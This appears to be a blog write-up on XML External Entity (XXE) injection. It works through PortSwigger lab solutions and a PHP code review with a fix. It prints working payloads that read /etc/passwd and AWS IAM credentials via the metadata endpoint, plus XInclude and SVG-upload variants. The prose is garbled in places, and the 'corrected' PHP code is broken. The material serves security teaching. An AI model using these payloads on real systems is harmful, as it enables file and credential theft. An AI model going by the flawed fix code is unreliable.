Introduction to XXE : Understanding and Exploiting XML External Entity Vulnerabilities
XML External Entity (XXE) injection, is a powerful vulnerability that exploit a misconfigured XML processors. These parsers when intended to external entities when vulnerable, sensitive files can to dat e read by hthe attackers, remote requests can be executed and even denial of service attacks triggered. This lab teaches the base principals of internal and external entities in XML and how to exploit them to gain a file disclosure.
Understanding XML External Entity (XXE) Vulnerabilities
XML External Entity (XXE) vulnerabilities are caused by an application-XML parser, when they are set up incorrectly or unrestrictive. It let’s the attacker re-structure the XML structure to disclosure of sensitive informations, server-side request forgery (SSRF), even indefinite denial-of-service (DoS).
XML Fundamentals
- XML (Extensible Markup Language):
XML is a markup language used for encoding of documents in a format that is human-readable and machine-readable. Every single a clean code file (in fact, altogether files) requires to meet criteria that are heavier than those it was feasible to accomplish to HTML. An XML document almost always has an XML declaration:
<?xml version="1.0" encoding="UTF-8"?>
- XML Declaration:
This statement sets the XML version and encoding.
Document Type Definition (DTD)
DTD:
DTD is a set of rules, which stands as the legal building elements for an XML document. It defines the document structure and specifies the elements and attributes. In a DTD, entities—like variables that hold reusable values can also be defined.
Example of a simple DTD declaring an internal entities:
<!DOCTYPE note [
<!ENTITY greeting "Hello, World!">
]>
<note>
<message>&greeting;</message>
</note>
In this case, the internal entity greeting
is defined as the string “Hello, World!” is then referenced as &greeting;
.
Entities in XML
- Internal Entities:
Internal entities are defined directly into the DTD and are equivalent to the literal value. They are used for avoid string repetition and for maintaining similarity.
<!ENTITY company "Example Corp">
- When invoked (e.g.
&company;
), the parser replaces it with the exact string “Example Corp”.
- External Entities:
External entities are declared using the SYSTEM
or PUBLIC
keyword and reference data coming from an external resource by a URI. For instance:
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
Here, the entity xxe
accesses data from /etc/passwd
. The URI in an external entity is referred to as the **system}, which names the source location of the external content.
- Parameterized Entities:
Such entities are included within DTDs to enable the definition of other entities. They are prefixed with % ` sign or are only available in the DTD. For example:
<!DOCTYPE config [
<!ENTITY % common "CommonConfigValue">
<!ENTITY fullConfig "%common; - Extended">
]>
<config>&fullConfig;</config>
Parameterized entities add more dynamic and modular DTDs but also increase the attack face when misused.
How XXE Works
When an XML parser is creating a document, it replaces entity reference with its value. If an attacker includes a malicious DTD that references an external entity to a sensitive file or an attacker-based URL, the parser accidentally inserts such data in the output or performs unintended network requests. This causes disclosure of data, SSRF and DoS condition if the parser tries to parse a vast amount of data e.g. Billion Laughs attack.
Core Concepts and XML Structure
XML Structure:
POSTs with XML bodies need to be always inspected. Find any place where you can put additional DTD information to inform the system of your custom entities.
Document Type Definitions (DTDs):
DTDs specify the structure of the XML document including entity declarations. Two primary types exist:
Internal Entities: Located in the accompanying XML document, put in syntax such as:
<!ENTITY gar "example value">
- Internal assigned objects behave like sorted variables and it is restricted to local content.
- External Entities: External entities can be referenced using the
SYSTEM
keyword and the resource can be specified via a URI such as file://
or http://
. For example:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
- External entities make the parser pull in and include content from an external source on instruction from outside..
Black Box Testing
Lab 1: Exploiting XXE using external entities to retrieve files
Lab URL - https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files
Step 1: Intercept the XML Request:
This step includes app exploration, clicking on every single button , once we view the product and click on view stocks, then we see an POST
request, looking at it, it seems to parse xml
entities. Let’s start tinkering with the product.
Step 2. Inject the Malicious DTD:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Step 3: Calling back the entity and formatting our XML syntax
Now since productId is reflected in the response, let’s call our entity back here. Our final payload should look something like this.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>
&xxe;
</productId><storeId>1</storeId></stockCheck>
With this modified syntax we would have solved the lab, do note that if you don’t use ;
then the XMl parser would throw an error.
Lab 2: Exploiting XXE to perform SSRF attacks
Now this lab is very simple, as for our previous lab we have used file://
protocol, this time we will use http
protocol to access internal data. Since this lab is hosted on AWS we would be using their IP address. Now we follow the same steps upto STEP 2
here we modify our payload a bit.
Step 2 : Our payload should look something like the following.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
We get an error, but worry not, because this error contains our path to the next directory we should look for.
Our response would look something like the following :
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 28
"Invalid product ID: latest"
Once we add latest to our payload, now our newly modified payload would look something like the following :
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest"> ]>
Step 3: Keep on modifying the payload, until we get our details.
Our final payload should be looking like the following. This contains our SecretAccessKey
in json format.
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
Don’t forget to call back our entity, our final payload http
request should look something like this. With this we should be able to solve our lab.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
Lab 3: Exploiting XInclude to retrieve files
Lab URL - https://portswigger.net/web-security/xxe/lab-xinclude-attack
When to Use XInclude
In situations, where standard XXE payloads are blocked with entity declaration restrictions as well as when the application only processes a portion of the XML, XInclude provides an alternate attack surface. This technique is achieved by adding an XInclude directive to XML fragments that do not support complete DOCTYPE declarations, thus allowing you to trigger file-fulfilment, on backend systems.
App Exploration:
Now we view the shop and click on check stock
option, unlike previous ones we do see an POST
request but, this time there is no XML
in the request.
Now we do send this to repeater and add our payload. Before that we tried converting this request into JSON
and XML
, it did not work. We also tried calling empty entities
but for security reasons they seem not to be enabled.
The Payload Breakdown
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
Our final http request
should look something like the following:
POST /product/stock HTTP/2
Host: 0aed0068045ca59e80d5eec200a80017.web-security-academy.net
Cookie: session=sIgSNWBNsJdoh5f2ez8rhpRnlbUCmAGO
Content-Length: 128
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Origin: https://0aed0068045ca59e80d5eec200a80017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aed0068045ca59e80d5eec200a80017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
&storeId=
Key Components
**Root Element <foo>
: A basic container element which only supplies structure for our payload and does not need to adhere to any certain schema
XInclude Namespace Declaration:
xmlns:xi="http://www.w3.org/2001/XInclude"
This binds the xi
prefix to the official XInclude namespace, from now on, the XML-Include
element is a red flag to XML processors.
XInclude Element: The core of our exploit:
href="file:///etc/passwd"
: Sends the target file that we want retrieve from local filesystem of the server
parse="text"
: Essential attribute to the processor that makes it tell to treat the included content as plain raw text instead of XML in order to avoid parsing errors since /etc/passwd is not valid XML
Why This Works
**Bypass Traditional XXE Protections **: XInclude is done at the XML processing level unlike DTD level, it will bypass the restriction from external entity.
Works in Partial XML Contexts: Also works when the application handles only XML snippets or isn’t able to read DOCTYPE
Lab 4: Exploiting XXE via image file upload
The Vulnerability
SVG files are XML native so as vectors for XML External Entity (XXE) attacks when they have no proper defense against upload issues. This post explains how a bad payload in an SVG avatar can use a server exploit.
The Payload Explained
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/hostname" >
]>
<svg width="128px" height="128px"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
Save this payload as an .svg
and upload in the avatar section. Make sure you upload your avatar
in choose file option.
Once you have uploaded, then go to your comments in the blog and view the image you have uploaded. The image should have hostname
. Submit the hostname
as answer, and with this you have solved your lab.
Breaking Down the Components
XML Declaration : <?xml version="1.0" standalone="yes"?>
indicates the XML version, and tells Mark that this document does not refer to any external DTDs, i.e., there is no foreign XML being imported.
DOCTYPE Declaration: Essential part that declares our exploit:
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/hostname" >
]>
This tells the XML parser to fetch the file contents of /etc/hostname
from the server filesystem and replace all of &xxe;
with it.
SVG Structure and Namespaces:
xmlns="http://www.w3.org/2000/svg"
declares the default SVG namespace
xmlns:xlink="http://www.w3.org/1999/xlink"
declares the xlink namespace, which helps maintain file validity as an SVG, ensuring proper processing even though it’s not directly used in our exploit
- The Attack Vector:
<text fontSize="16" x="0" y="16">&xxe;</text>
contains the entity reference that will be replaced with server’s hostname when parsed
Why This Works
SVG as a XML Trojan horse: Images created in SVG, being XML based, but they are typically treated as image content, can bypass content filters while carrying an XML payload attack.
Misconfigured Xml Parsers: If the server allows xml parser to load external entity (usually a mistake), the server will load data of the external file.
Information Disclosure: The hostname is displayed as text in the SVG “image” after processing with the information being exfiltrated from the server thanks to the vulnerability.
White Box Testing
Source - Code Analysis:
(Location: OrderController.php
inside controllers
folder→ order()
method)
Here’s the problematic code handling XML input:
else if ($_SERVER['HTTP_CONTENT_TYPE'] === 'application/xml')
{
$order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOENT);
if (!$order->food) return 'You need to select a food option first';
return "Your ($order->food) order has been submitted successfully.";
}
The code is vulnerable to xxe
attack due to the following reasons:
1. The vulnerability is in the flags: LIBXML_NOENT
The simplexml_load_string()
function has LIBXML_NOENT
flag. This flag advises the XML parser to expand all XML entities to there values. For example, &
becomes &
. But then when thrown with external elements, this is ammunition:
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><food>&xxe;</food></order>
Here &xxe;
gets expands into /etc/passwd
due to the LIBXML_NOENT
.
2. No Entity Loader Restrictions
The code does not disable PHP’s External Entity Loader. By default PHP will allow XML parsers to fetch the external resources (such as files or urls). This can be skipped as if it is not disabled, the attackers can read arbitary files.
3. No Input Validation
The application trusts blindly any XML input. There is no validation to defence against kind of risky things such as <!DOCTYPE>
or <!ENTITY>
.
Exploitation:
First Attempt:
We explore the application and we realise that it sends data through json
. So let’s google up quick payload for xxe
to get a flag. We end up with the following payload. We do small tweaks to our payload so that we get flag.
Final payload :
<?xm:l version="1.0"?>
<!DOCTYPE test [<!ENTITY test SYSTEM 'file://flag'>]>
<order><food>&test;</food></order>
But our server responds with the following error message:
{“status”:“danger”,“message”:“You need to select a food option first”}
Second Attempt:
Even after changing the json
data to xml
the web application throws an 400
error. We did change our request using content type converter
plugin, but seems like content-type
should strictly be Content-Type: application/xml
and not Content-Type: application/xml;charset=UTF-8
. Our sweet plugin adds this charset=UTF-8
which returns the 404 error
.
Despite changing our content type we get the following error. Maybe it has got something to do with the tags.
You need to select a food option first
Third attempt :
Got this payload from walk through, realised my mistake was not using json data
as inputs and creating tags. Seems like this web application accepts only certain type of data as input. Our final payload looks somewhat like this :
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///flag"> ]>
<order>
<table_num>1</table_num>
<food>&ent;</food>
</order>
With this we successfully get our flag.
Mitigation
Step 1: Remove LIBXML_NOENT
This flag is not needed for many use cases and directly enables entity substitution.
Step 2: Disable External Entities
Add this line before XML parser is invoked:
libxml_disable_entity_loader(true); // Block external entities
Step 3: Use Safe Parsing Flags
Replace LIBXML_NOENT
with LIBXML_NONET
to avoid network request:
$order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);
Corrected Code snippet
else if ($_SERVER['HTTP_CONTENT_TYPE'] === 'application/xml')
{
libxml_disable_entity_loader(true); // 🔒 CRITICAL FIX
$order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);
if (!$order->food) return 'Please choose a food first';
return Your ($order->food) order has been successfully submited.
}
We made in the following code change to our code:
libxml_disable_entity_loader(true)
- Disables PHP ability to load external f.dozens. Even if the SPA tries to inject
<!ENTITY>
, the parser cant resolve it.
LIBXML_NONET
- Prevents the parser from blocking network access (e.g.
http://internal-server
).
No Entity Substitution
- If not
LIBXML_NOENT
, &xxe;
remains unchanged.
Note to readers: While this fix looks very appealing, in reality while running docker to build the web application, the whole backend broke down. That’s due to Alpine edge repository did not have php version 7 anymore.
Conclusion: Securing the XML Gateway
XXE vulnerabilities expose a critical flaw in how applications trust and process XML input, which could be abused by anyone who has malicious intent. It servers as a reminder that even structured data can be weaponized. From stealing sensitive files to triggering SSRF attacks, XXE demonstrates how a single misconfigured parser can become a gateway for catastrophic breaches.
Key Takeaways:
Parse xml with caution: XML parsers should ship hardened, disable external entities, validate if not disable external DTD, validate inputs carefully.
Beyond the Obvious: XXE isn’t just about file://
parameters. Methods like XInclude
and SVG payloads
demonstrate that attackers will create where they cannot solve.
The Mitigation Myth: While in 2025 it became easy to spot errors using AI
tools and fix them
, most of the production code have a lot of dependencies, and might be deployed on docker, which may get outdated soon. In reality when working with this issue even if we have the right fix, sometimes we might not be able to run the web application. In our case, the dockerfile had an error due to the Alpine edge repository not having PHP 7 anymore.
🔐 The secure path forward? Presume every XML document is a threat – until proven otherwise.